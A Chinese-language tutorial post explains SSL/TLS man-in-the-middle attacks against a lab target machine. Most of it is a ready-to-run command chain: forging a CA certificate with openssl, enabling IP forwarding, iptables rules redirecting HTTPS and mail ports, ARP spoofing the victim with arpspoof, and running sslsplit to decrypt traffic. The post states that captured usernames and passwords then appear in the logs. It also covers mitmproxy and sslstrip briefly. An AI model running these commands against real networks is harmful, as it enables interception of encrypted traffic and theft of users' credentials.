分享免费的编程资源和教程

网站首页 > 技术教程 正文

SSL\TLS中间人攻击 https能避免中间人攻击

goqiw 2024-10-11 15:10:02 技术教程 31 ℃ 0 评论
  • 攻击者位于客户端和服务器通信链路中
    • ARP
    • DHCP
    • 修改网关
    • 修改DNS
    • 修改HOSTS
    • ICMP\STP\OSPF
    • 加密流量


  • 攻击的前提
    • 客户端已经信任伪造证书颁发机构
    • 攻击者控制了核心证书颁发机构
    • 客户端程序禁止了显示证书错误告警信息
    • 攻击者已经控制客户端,并强制其信任伪造证书


SSLsplit

  • 透明SSL/TLS中间人攻击工具
  • 对客户端伪装为服务器,对服务器伪装成普通客户端
  • 伪装服务器需要伪造证书
  • 支持SSL/TLS加密的SMTP\POP4\FTP等通信中间人攻击


  • 利用openssl生成证书私钥
openssl  genrsa   -out  ca.key  2048


  • 利用私钥签名生成证书


openssl req -new -x509 -days 1096 -key ca.key -out ca.crt


  • 启动路由
sysctl -w net.ipv4.ip_forward=1


  • 配置iptables端口转发规则
iptables -t nat -F  (全部清空)
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S
iptables -t nat -L


  • 下一步就是要进行ARP欺骗,看下我们的靶机


  • ARP欺骗
arpspoof -i eth0 -t  192.168.0.118 -r 192.168.0.1


  • 启动SSLsplit
mkdir -p test/logdir
sslsplit -D -l connect.log -j /root/test -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080



  • 之后靶机访问网站都是使用我们伪造的证书,之后我们在logdir里面可以看到日志,包括用户数据的用户名和密码等等



Mitmproxy

mitmproxy -T --host -w mitmproxy.log

这个不演示了,也是一样,搞个ARP欺骗,侦听一个端口,就行了


SSLstrip

  • 与之前两种工具不同,将客户端到中间人之间的流量变为明文
sslstrip  -l 8080

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表